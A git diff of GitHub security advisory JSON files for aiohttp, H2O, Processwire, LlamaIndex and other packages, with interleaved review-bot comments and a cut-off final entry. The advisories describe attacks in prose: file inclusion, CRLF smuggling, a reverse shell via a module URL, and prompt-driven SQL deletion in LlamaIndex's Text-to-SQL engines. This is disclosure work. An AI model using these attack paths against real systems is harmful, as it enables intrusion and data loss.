diff --git a/advisories/github-reviewed/2023/11/GHSA-6mv8-95x5-xcq9/GHSA-6mv8-95x5-xcq9.json b/advisories/github-reviewed/2023/11/GHSA-6mv8-95x5-xcq9/GHSA-6mv8-95x5-xcq9.json new file mode 100644 index 0000000000000..a5a201f0f26e4 --- /dev/null +++ b/advisories/github-reviewed/2023/11/GHSA-6mv8-95x5-xcq9/GHSA-6mv8-95x5-xcq9.json @@ -0,0 +1,62 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6mv8-95x5-xcq9", + "modified": "2024-02-08T18:41:10Z", + "published": "2023-11-16T18:30:31Z", + "aliases": [ + "CVE-2023-6038" + ], + "summary": "H2O local file inclusion vulnerability", + "details": "An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "ai.h2o:h2o-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.40.0.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6038" + }, + { + "type": "PACKAGE", + "url": "https://github.com/h2oai/h2o-3" + }, + { + "type": "WEB", + "url": "https://huntr.com/bounties/380fce33-fec5-49d9-a101-12c972125d8c" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-29", + "CWE-862" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:41:10Z", + "nvd_published_at": "2023-11-16T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2023/11/GHSA-gfw2-4jvh-wgfg/GHSA-gfw2-4jvh-wgfg.json b/advisories/github-reviewed/2023/11/GHSA-gfw2-4jvh-wgfg/GHSA-gfw2-4jvh-wgfg.json index 9bc272e6477ff..f690b08fbd06f 100644 --- a/advisories/github-reviewed/2023/11/GHSA-gfw2-4jvh-wgfg/GHSA-gfw2-4jvh-wgfg.json +++ b/advisories/github-reviewed/2023/11/GHSA-gfw2-4jvh-wgfg/GHSA-gfw2-4jvh-wgfg.json 
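Review bot: The `details` string names no version at all, so the `"last_affected": "3.40.0.4"` range cannot be checked against the prose and a reader gets no hint whether a fixed release exists, whereas the Jenkins entries in this commit state "X and earlier" in the text. Proposed: `"details": "H2O 3.40.0.4 and earlier: an attacker is able to read any file on the server hosting the H2O dashboard without any authentication."`, plus a sentence on fix status if one is known from the huntr report. The `cwe_ids` pairing of CWE-29 (the specific `\..\filename` traversal variant) with CWE-862 also looks narrower than the summary's "local file inclusion"; if the report describes generic traversal, the parent CWE-22 is the more conventional tag.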
@@ -60,6 +60,10 @@ "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/aiohttp/PYSEC-2023-246.yaml" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FUSJVQ7OQ55RWL4XAX2F5EZ73N4ZSH6U/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VDKQ6HM3KNDU4OQI476ZWT4O7DMSIT35/" diff --git a/advisories/github-reviewed/2023/11/GHSA-hxjc-9j8v-v9pr/GHSA-hxjc-9j8v-v9pr.json b/advisories/github-reviewed/2023/11/GHSA-hxjc-9j8v-v9pr/GHSA-hxjc-9j8v-v9pr.json index 157c0734310cf..ce5542019d62d 100644 --- a/advisories/github-reviewed/2023/11/GHSA-hxjc-9j8v-v9pr/GHSA-hxjc-9j8v-v9pr.json +++ b/advisories/github-reviewed/2023/11/GHSA-hxjc-9j8v-v9pr/GHSA-hxjc-9j8v-v9pr.json 
@@ -1,13 +1,14 @@ { "schema_version": "1.4.0", "id": "GHSA-hxjc-9j8v-v9pr", - "modified": "2023-11-16T21:02:40Z", + "modified": "2024-02-07T18:20:22Z", "published": "2023-11-16T15:30:20Z", + "withdrawn": "2024-02-07T18:20:22Z", "aliases": [ - "CVE-2023-4771" + ], - "summary": "CKEditor Cross-site Scripting vulnerability", - "details": "A Cross-Site scripting vulnerability has been found in CKSource CKEditor affecting versions 4.15.1 and earlier. An attacker could send malicious javascript code through the /`ckeditor/samples/old/ajax.html` file and retrieve an authorized user's information.", + "summary": "Duplicate Advisory: CKEditor Cross-site Scripting vulnerability", + "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-wh5w-82f3-wrxh. This link is maintained to preserve external references.\n\n## Original Description\nA Cross-Site scripting vulnerability has been found in CKSource CKEditor affecting versions 4.15.1 and earlier. An attacker could send malicious javascript code through the /`ckeditor/samples/old/ajax.html` file and retrieve an authorized user's information.", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2023/11/GHSA-jfhm-5ghh-2f97/GHSA-jfhm-5ghh-2f97.json b/advisories/github-reviewed/2023/11/GHSA-jfhm-5ghh-2f97/GHSA-jfhm-5ghh-2f97.json index 4f92056515744..b5d63e57a9ebf 100644 --- a/advisories/github-reviewed/2023/11/GHSA-jfhm-5ghh-2f97/GHSA-jfhm-5ghh-2f97.json +++ b/advisories/github-reviewed/2023/11/GHSA-jfhm-5ghh-2f97/GHSA-jfhm-5ghh-2f97.json @@ -20,6 +20,12 @@ "ecosystem": "PyPI", "name": "cryptography" }, + "ecosystem_specific": { + "affected_functions": [ + "cryptography.hazmat.primitives.serialization.pkcs7.load_der_pkcs7_certificates", + "cryptography.hazmat.primitives.serialization.pkcs7.load_pem_pkcs7_certificates" + ] + }, "ranges": [ { "type": "ECOSYSTEM", 
diff --git a/advisories/github-reviewed/2023/11/GHSA-q3qx-c6g2-7pw2/GHSA-q3qx-c6g2-7pw2.json b/advisories/github-reviewed/2023/11/GHSA-q3qx-c6g2-7pw2/GHSA-q3qx-c6g2-7pw2.json
index 56776e67cb25a..d904ffac36f44 100644
--- a/advisories/github-reviewed/2023/11/GHSA-q3qx-c6g2-7pw2/GHSA-q3qx-c6g2-7pw2.json
+++ b/advisories/github-reviewed/2023/11/GHSA-q3qx-c6g2-7pw2/GHSA-q3qx-c6g2-7pw2.json
@@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-q3qx-c6g2-7pw2", - "modified": "2023-11-30T15:27:39Z", + "modified": "2024-01-29T14:09:14Z", "published": "2023-11-27T23:17:42Z", "aliases": [ "CVE-2023-49081" ], "summary": "aiohttp's ClientSession is vulnerable to CRLF injection via version", - "details": "### Summary\nImproper validation make it possible for an attacker to modify the HTTP request (e.g. to insert a new header) or even create a new HTTP request if the attacker controls the HTTP version.\n\n### Details\nThe vulnerability only occurs if the attacker can control the HTTP version of the request (including its type).\nFor example if an unvalidated JSON value is used as a version and the attacker is then able to pass an array as the `version` parameter.\nFurthermore, the vulnerability only occurs when the `Connection` header is passed to the `headers` parameter.\n\nAt this point, the library will use the parsed value to create the request. If a list is passed, then it bypasses validation and it is possible to perform CRLF injection.\n\n### PoC\nThe POC below shows an example of providing an unvalidated array as a version:\nhttps://gist.github.com/jnovikov/184afb593d9c2114d77f508e0ccd508e\n\n### Impact\nCRLF injection leading to Request Smuggling.\n\n### Workaround\nIf these specific conditions are met and you are unable to upgrade, then validate the user input to the `version` parameter to ensure it is a `str`.", + "details": "### Summary\nImproper validation make it possible for an attacker to modify the HTTP request (e.g. 
to insert a new header) or even create a new HTTP request if the attacker controls the HTTP version.\n\n### Details\nThe vulnerability only occurs if the attacker can control the HTTP version of the request (including its type).\nFor example if an unvalidated JSON value is used as a version and the attacker is then able to pass an array as the `version` parameter.\nFurthermore, the vulnerability only occurs when the `Connection` header is passed to the `headers` parameter.\n\nAt this point, the library will use the parsed value to create the request. If a list is passed, then it bypasses validation and it is possible to perform CRLF injection.\n\n### PoC\nThe POC below shows an example of providing an unvalidated array as a version:\nhttps://gist.github.com/jnovikov/184afb593d9c2114d77f508e0ccd508e\n\n### Impact\nCRLF injection leading to Request Smuggling.\n\n### Workaround\nIf these specific conditions are met and you are unable to upgrade, then validate the user input to the `version` parameter to ensure it is a `str`.\n\nPatch: https://github.com/aio-libs/aiohttp/pull/7835/files", "severity": [ { "type": "CVSS_V3", @@ -44,6 +44,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49081" }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/pull/7835/files" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/commit/1e86b777e61cf4eefc7d92fa57fa19dcc676013b" + }, { "type": "WEB", "url": "https://gist.github.com/jnovikov/184afb593d9c2114d77f508e0ccd508e" @@ -52,6 +60,10 @@ "type": "PACKAGE", "url": "https://github.com/aio-libs/aiohttp" }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/aiohttp/PYSEC-2023-250.yaml" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TY5SI6NK5243DEEDQUFKQKW5GQNKQUMA/" 
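Review bot: The Workaround tells callers to ensure `version` is a `str` but does not say why that is sufficient; per the Details in the same string, it is the list form that bypasses aiohttp's version validation, so the point is that the string form is the validated path, not that a type check is itself the defense. Spell that out so readers do not assume a `str` containing CR/LF is safe by construction, e.g. `...ensure it is a str; non-string values such as lists bypass aiohttp's version validation, which is what permits the CRLF injection.` Appending `Patch: <url>` to `details` duplicates the new `references` entry for the same pull request; harmless, but `references` is the machine-readable place for it.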
diff --git a/advisories/github-reviewed/2023/11/GHSA-qvrw-v9rv-5rjx/GHSA-qvrw-v9rv-5rjx.json b/advisories/github-reviewed/2023/11/GHSA-qvrw-v9rv-5rjx/GHSA-qvrw-v9rv-5rjx.json
index 2da2e4c817161..844378e55ce25 100644
--- a/advisories/github-reviewed/2023/11/GHSA-qvrw-v9rv-5rjx/GHSA-qvrw-v9rv-5rjx.json
+++ b/advisories/github-reviewed/2023/11/GHSA-qvrw-v9rv-5rjx/GHSA-qvrw-v9rv-5rjx.json
@@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-qvrw-v9rv-5rjx", - "modified": "2023-11-29T21:50:01Z", + "modified": "2024-01-29T14:10:07Z", "published": "2023-11-27T23:17:24Z", "aliases": [ "CVE-2023-49082" ], "summary": "aiohttp's ClientSession is vulnerable to CRLF injection via method", - "details": "### Summary\nImproper validation makes it possible for an attacker to modify the HTTP request (e.g. insert a new header) or even create a new HTTP request if the attacker controls the HTTP method.\n\n### Details\nThe vulnerability occurs only if the attacker can control the HTTP method (GET, POST etc.) of the request.\n\nPrevious releases performed no validation on the provided value. If an attacker controls the HTTP method it will be used as is and can lead to HTTP request smuggling.\n\n### PoC\nA minimal example can be found here:\nhttps://gist.github.com/jnovikov/7f411ae9fe6a9a7804cf162a3bdbb44b\n\n### Impact\nIf the attacker can control the HTTP version of the request it will be able to modify the request (request smuggling).\n\n### Workaround\nIf unable to upgrade and using user-provided values for the request method, perform manual validation of the user value (e.g. by restricting it to a few known values like GET, POST etc.).", + "details": "### Summary\nImproper validation makes it possible for an attacker to modify the HTTP request (e.g. insert a new header) or even create a new HTTP request if the attacker controls the HTTP method.\n\n### Details\nThe vulnerability occurs only if the attacker can control the HTTP method (GET, POST etc.) of the request.\n\nPrevious releases performed no validation on the provided value. 
If an attacker controls the HTTP method it will be used as is and can lead to HTTP request smuggling.\n\n### PoC\nA minimal example can be found here:\nhttps://gist.github.com/jnovikov/7f411ae9fe6a9a7804cf162a3bdbb44b\n\n### Impact\nIf the attacker can control the HTTP version of the request it will be able to modify the request (request smuggling).\n\n### Workaround\nIf unable to upgrade and using user-provided values for the request method, perform manual validation of the user value (e.g. by restricting it to a few known values like GET, POST etc.).\n\nPatch: https://github.com/aio-libs/aiohttp/pull/7806/files", "severity": [ { "type": "CVSS_V3", @@ -44,6 +44,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49082" }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/pull/7806/files" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/commit/e4ae01c2077d2cfa116aa82e4ff6866857f7c466" + }, { "type": "WEB", "url": "https://gist.github.com/jnovikov/7f411ae9fe6a9a7804cf162a3bdbb44b" @@ -52,6 +60,10 @@ "type": "PACKAGE", "url": "https://github.com/aio-libs/aiohttp" }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/aiohttp/PYSEC-2023-251.yaml" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TY5SI6NK5243DEEDQUFKQKW5GQNKQUMA/" diff --git a/advisories/github-reviewed/2023/12/GHSA-45x7-px36-x8w8/GHSA-45x7-px36-x8w8.json b/advisories/github-reviewed/2023/12/GHSA-45x7-px36-x8w8/GHSA-45x7-px36-x8w8.json index dd2db23b240fb..5fed91be321b3 100644 --- a/advisories/github-reviewed/2023/12/GHSA-45x7-px36-x8w8/GHSA-45x7-px36-x8w8.json +++ b/advisories/github-reviewed/2023/12/GHSA-45x7-px36-x8w8/GHSA-45x7-px36-x8w8.json @@ -63,7 +63,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.5.0" }, { "fixed": "3.4.0" 
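Review bot: The Impact section still reads `If the attacker can control the HTTP version of the request it will be able to modify the request`, but this advisory (GHSA-qvrw-v9rv-5rjx, CVE-2023-49082) is about the HTTP method; the sentence appears to have been carried over from the companion advisory GHSA-q3qx-c6g2-7pw2 and should read `If the attacker can control the HTTP method of the request it will be able to modify the request (request smuggling).` The commit already rewrites this `details` string to append the patch link, so the correction belongs in the same change. The allow-list workaround is sound; for callers that cannot enumerate methods, it would be worth adding that any value containing whitespace or control characters must be rejected, since that is the injection primitive described.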
@@ -110,6 +110,10 @@ "type": "WEB", "url": "https://github.com/paramiko/paramiko/issues/2337" }, + { + "type": "WEB", + "url": "https://github.com/paramiko/paramiko/issues/2337#issuecomment-1887642773" + }, { "type": "WEB", "url": "https://github.com/proftpd/proftpd/issues/456" @@ -314,6 +318,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3CAYYW35MUTNO65RVAELICTNZZFMT2XS/" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3JIMLVBDWOP4FUPXPTB4PGHHIOMGFLQE/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3YQLUQWLIHDB5QCXQEX7HXHAWMOKPP5O/" @@ -358,6 +366,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KMZCVGUGJZZVDPCVDA7TEB22VUCNEXDD/" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L5Y6MNNVAPIJSXJERQ6PKZVCIUXSNJK7/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LZQVUHWVWRH73YBXUQJOD6CKHDQBU3DM/" diff --git a/advisories/github-reviewed/2023/12/GHSA-5r3q-93q3-f978/GHSA-5r3q-93q3-f978.json b/advisories/github-reviewed/2023/12/GHSA-5r3q-93q3-f978/GHSA-5r3q-93q3-f978.json index 9c4d38ffc7c96..60a6d56361ad7 100644 --- a/advisories/github-reviewed/2023/12/GHSA-5r3q-93q3-f978/GHSA-5r3q-93q3-f978.json +++ b/advisories/github-reviewed/2023/12/GHSA-5r3q-93q3-f978/GHSA-5r3q-93q3-f978.json @@ -53,6 +53,10 @@ "type": "PACKAGE", "url": "https://github.com/mlflow/mlflow" }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/mlflow/PYSEC-2023-252.yaml" + }, { "type": "WEB", "url": "https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850" 
diff --git a/advisories/github-reviewed/2023/12/GHSA-cgwq-6prq-8h9q/GHSA-cgwq-6prq-8h9q.json b/advisories/github-reviewed/2023/12/GHSA-cgwq-6prq-8h9q/GHSA-cgwq-6prq-8h9q.json index ccebd602b5668..7385fdd9d72b6 100644 --- a/advisories/github-reviewed/2023/12/GHSA-cgwq-6prq-8h9q/GHSA-cgwq-6prq-8h9q.json +++ b/advisories/github-reviewed/2023/12/GHSA-cgwq-6prq-8h9q/GHSA-cgwq-6prq-8h9q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cgwq-6prq-8h9q", - "modified": "2023-12-06T03:14:51Z", + "modified": "2024-02-07T16:16:53Z", "published": "2023-12-05T22:46:25Z", "aliases": [ "CVE-2023-49282" @@ -63,6 +63,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49282" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/microsoft/microsoft-graph/CVE-2023-49282.yaml" + }, { "type": "WEB", "url": "https://github.com/microsoftgraph/msgraph-beta-sdk-php/compare/2.0.0...2.0.1" diff --git a/advisories/github-reviewed/2023/12/GHSA-hj4c-vfc4-5f9c/GHSA-hj4c-vfc4-5f9c.json b/advisories/github-reviewed/2023/12/GHSA-hj4c-vfc4-5f9c/GHSA-hj4c-vfc4-5f9c.json index 5a2f780c0c3b2..7c3950ceb4b3a 100644 --- a/advisories/github-reviewed/2023/12/GHSA-hj4c-vfc4-5f9c/GHSA-hj4c-vfc4-5f9c.json +++ b/advisories/github-reviewed/2023/12/GHSA-hj4c-vfc4-5f9c/GHSA-hj4c-vfc4-5f9c.json @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://github.com/SemanticMediaWiki/SemanticMediaWiki/commit/604968d44fcdfcbb7f1e00c5d662ca5d5a3a5613" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mediawiki/semantic-media-wiki/CVE-2022-48614.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/SemanticMediaWiki/SemanticMediaWiki" diff --git a/advisories/github-reviewed/2023/12/GHSA-m5hf-m3r2-xq53/GHSA-m5hf-m3r2-xq53.json b/advisories/github-reviewed/2023/12/GHSA-m5hf-m3r2-xq53/GHSA-m5hf-m3r2-xq53.json index 86bfe8bcaa780..7e76cca611d0e 100644 
--- a/advisories/github-reviewed/2023/12/GHSA-m5hf-m3r2-xq53/GHSA-m5hf-m3r2-xq53.json +++ b/advisories/github-reviewed/2023/12/GHSA-m5hf-m3r2-xq53/GHSA-m5hf-m3r2-xq53.json @@ -28,11 +28,14 @@ "introduced": "5.8.22" }, { - "last_affected": "5.8.24" + "fixed": "5.8.25" } ] } - ] + ], + "database_specific": { + "last_known_affected_version_range": "<= 5.8.24" + } } ], "references": [ diff --git a/advisories/github-reviewed/2023/12/GHSA-mhhp-c3cm-2r86/GHSA-mhhp-c3cm-2r86.json b/advisories/github-reviewed/2023/12/GHSA-mhhp-c3cm-2r86/GHSA-mhhp-c3cm-2r86.json index 09446135df9da..6130d75a8b81c 100644 --- a/advisories/github-reviewed/2023/12/GHSA-mhhp-c3cm-2r86/GHSA-mhhp-c3cm-2r86.json +++ b/advisories/github-reviewed/2023/12/GHSA-mhhp-c3cm-2r86/GHSA-mhhp-c3cm-2r86.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mhhp-c3cm-2r86", - "modified": "2023-12-06T03:16:33Z", + "modified": "2024-02-07T16:17:14Z", "published": "2023-12-05T22:46:57Z", "aliases": [ "CVE-2023-49283" @@ -48,6 +48,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49283" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/microsoft/microsoft-graph-core/CVE-2023-49283.yaml" + }, { "type": "WEB", "url": "https://github.com/microsoftgraph/msgraph-beta-sdk-php/compare/2.0.0...2.0.1" diff --git a/advisories/github-reviewed/2024/01/GHSA-297x-2qf3-jrj3/GHSA-297x-2qf3-jrj3.json b/advisories/github-reviewed/2024/01/GHSA-297x-2qf3-jrj3/GHSA-297x-2qf3-jrj3.json index e72c0c3ffb9fe..180f26f3dca64 100644 --- a/advisories/github-reviewed/2024/01/GHSA-297x-2qf3-jrj3/GHSA-297x-2qf3-jrj3.json +++ b/advisories/github-reviewed/2024/01/GHSA-297x-2qf3-jrj3/GHSA-297x-2qf3-jrj3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-297x-2qf3-jrj3", - "modified": "2024-01-22T21:23:34Z", + "modified": "2024-01-29T16:25:51Z", "published": "2024-01-21T18:30:34Z", "aliases": [ "CVE-2024-23730" 
@@ -9,7 +9,10 @@ "summary": "Unsafe yaml deserialization in llama-hub", "details": "The OpenAPI and ChatGPT plugin loaders in LlamaHub (aka llama-hub) before 0.0.67 allow attackers to execute arbitrary code because safe_load is not used for YAML.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { @@ -39,7 +42,11 @@ }, { "type": "WEB", - "url": "https://github.com/run-llama/llama-hub/pull/841/commits/9dc9c21a5c6d0226d1d2101c3121d4f085743d52" + "url": "https://github.com/run-llama/llama-hub/commit/c01416e737c7747a213a79881b8308c41d043515" + }, + { + "type": "PACKAGE", + "url": "https://github.com/run-llama/llama-hub" }, { "type": "WEB", @@ -54,7 +61,7 @@ "cwe_ids": [ "CWE-502" ], - "severity": "HIGH", + "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2024-01-22T21:23:34Z", "nvd_published_at": "2024-01-21T17:15:44Z" diff --git a/advisories/github-reviewed/2024/01/GHSA-29w6-c52g-m8jc/GHSA-29w6-c52g-m8jc.json b/advisories/github-reviewed/2024/01/GHSA-29w6-c52g-m8jc/GHSA-29w6-c52g-m8jc.json new file mode 100644 index 0000000000000..4776e870c8d40 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-29w6-c52g-m8jc/GHSA-29w6-c52g-m8jc.json 
@@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-29w6-c52g-m8jc", + "modified": "2024-01-31T18:05:46Z", + "published": "2024-01-31T18:05:46Z", + "aliases": [ + + ], + "summary": "C5 Firefly III CSV Injection.", + "details": "### Summary\nCSV injection is a vulnerability where untrusted user input in CSV files can lead to unauthorized access or data manipulation. \nIn my subsequent testing of the application.\n\n### Details\nI discovered that there is an option to \"Export Data\" from the web app to your personal computer, which exports a \"csv\" file that can be opened with Excel software that supports macros.\n\nP.S \nI discovered that the web application's is offering a demo-site that anyone may access to play with the web application. So, there's a chance that someone will export the data (CVS) from the demo site and execute it on their PC, giving the malicious actor a complete control over their machine. (if a user enters a malicious payload to the website).\n\n### PoC\nYou can check out my vulnerability report if you need more details/PoC with screenshots: (removed by JC5)\n\n### Impact\nAn attacker can exploit this by entering a specially crafted payload to one of the fields, and when a user export the csv file using the \"Export Data\" function, the attacker can potentiality can RCE.\n\n### Addendum by JC5, the developer of Firefly III\nThere is zero impact on normal users, even on vulnerable versions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "grumpydictator/firefly-iii" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.1.7" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/firefly-iii/firefly-iii/security/advisories/GHSA-29w6-c52g-m8jc" + }, + { + "type": "PACKAGE", + "url": 
"https://github.com/firefly-iii/firefly-iii" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T18:05:46Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-2cvg-w29m-j8xc/GHSA-2cvg-w29m-j8xc.json b/advisories/github-reviewed/2024/01/GHSA-2cvg-w29m-j8xc/GHSA-2cvg-w29m-j8xc.json index a31e1f28ca0d5..ee04efa524474 100644 --- a/advisories/github-reviewed/2024/01/GHSA-2cvg-w29m-j8xc/GHSA-2cvg-w29m-j8xc.json +++ b/advisories/github-reviewed/2024/01/GHSA-2cvg-w29m-j8xc/GHSA-2cvg-w29m-j8xc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2cvg-w29m-j8xc", - "modified": "2024-01-24T21:54:14Z", + "modified": "2024-01-30T21:33:59Z", "published": "2024-01-24T21:30:33Z", "aliases": [ "CVE-2023-24676" @@ -9,7 +9,10 @@ "summary": "Arbitrary Code Execution in Processwire", "details": "An issue found in Processwire 3.0.210 allows attackers to execute arbitrary code and install a reverse shell via the download_zip_url parameter when installing a new module.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { @@ -37,6 +40,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-24676" }, + { + "type": "PACKAGE", + "url": "https://github.com/processwire/processwire" + }, { "type": "WEB", "url": "https://medium.com/%40cupc4k3/reverse-shell-via-remote-file-inlusion-in-proccesswire-cms-a8fa5ace3255" @@ -46,7 +53,7 @@ "cwe_ids": [ "CWE-94" ], - "severity": "CRITICAL", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-01-24T21:54:14Z", "nvd_published_at": "2024-01-24T21:15:08Z" diff --git a/advisories/github-reviewed/2024/01/GHSA-2jxw-4hm4-6w87/GHSA-2jxw-4hm4-6w87.json b/advisories/github-reviewed/2024/01/GHSA-2jxw-4hm4-6w87/GHSA-2jxw-4hm4-6w87.json index eefed4d48952e..e52cfae32953a 100644 
--- a/advisories/github-reviewed/2024/01/GHSA-2jxw-4hm4-6w87/GHSA-2jxw-4hm4-6w87.json +++ b/advisories/github-reviewed/2024/01/GHSA-2jxw-4hm4-6w87/GHSA-2jxw-4hm4-6w87.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2jxw-4hm4-6w87", - "modified": "2024-01-23T20:10:02Z", + "modified": "2024-01-29T16:31:48Z", "published": "2024-01-22T03:30:26Z", "aliases": [ "CVE-2024-23751" @@ -9,7 +9,10 @@ "summary": "SQL injection in llama-index", "details": "LlamaIndex (aka llama_index) through 0.9.35 allows SQL injection via the Text-to-SQL feature in NLSQLTableQueryEngine, SQLTableRetrieverQueryEngine, NLSQLRetriever, RetrieverQueryEngine, and PGVectorSQLQueryEngine. For example, an attacker might be able to delete this year's student records via \"Drop the Students table\" within English language input.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { @@ -54,7 +57,7 @@ "cwe_ids": [ "CWE-89" ], - "severity": "HIGH", + "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2024-01-23T20:10:02Z", "nvd_published_at": "2024-01-22T01:15:08Z" diff --git a/advisories/github-reviewed/2024/01/GHSA-2wgc-48g2-cj5w/GHSA-2wgc-48g2-cj5w.json b/advisories/github-reviewed/2024/01/GHSA-2wgc-48g2-cj5w/GHSA-2wgc-48g2-cj5w.json new file mode 100644 index 0000000000000..4aa7a2b4e17c1 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-2wgc-48g2-cj5w/GHSA-2wgc-48g2-cj5w.json 
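Review bot: The advisory offers no workaround even though the description makes clear that the Text-to-SQL engines execute model-generated SQL against the configured database; a deployer-side mitigation exists regardless of library version and should be stated, e.g. `Workaround: connect the SQL query engines through a database role with read-only privileges on the tables they need, so that statements such as DROP TABLE are rejected by the database itself.` The details say `through 0.9.35` and the affected range is outside the visible hunks, so a reader of this text alone cannot tell whether upgrading helps; if a fixed release exists, it should be named here as well. Raising `severity` to CRITICAL with PR:N/UI:N is consistent with the description, since the natural-language input is the attack surface.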
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2wgc-48g2-cj5w", + "modified": "2024-01-30T20:56:46Z", + "published": "2024-01-30T20:56:46Z", + "aliases": [ + "CVE-2024-21653" + ], + "summary": "vantage6 has insecure SSH configuration for node and server containers", + "details": "### Impact\nNodes and servers get a ssh config by default that permits root login with password authentication. In a proper deployment, the SSH service is not exposed so there is no risk, but not all deployments are ideal. The default should therefore be less permissive.\n\nWe will probably opt to completely remove the ssh option as it is only used for debugging. Later, we can add a debug mode where we can activate it if necessary.\n\n### Workarounds\nRemove the ssh part from the docker file and build your own docker image", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "vantage6" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/vantage6/vantage6/security/advisories/GHSA-2wgc-48g2-cj5w" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21653" + }, + { + "type": "WEB", + "url": 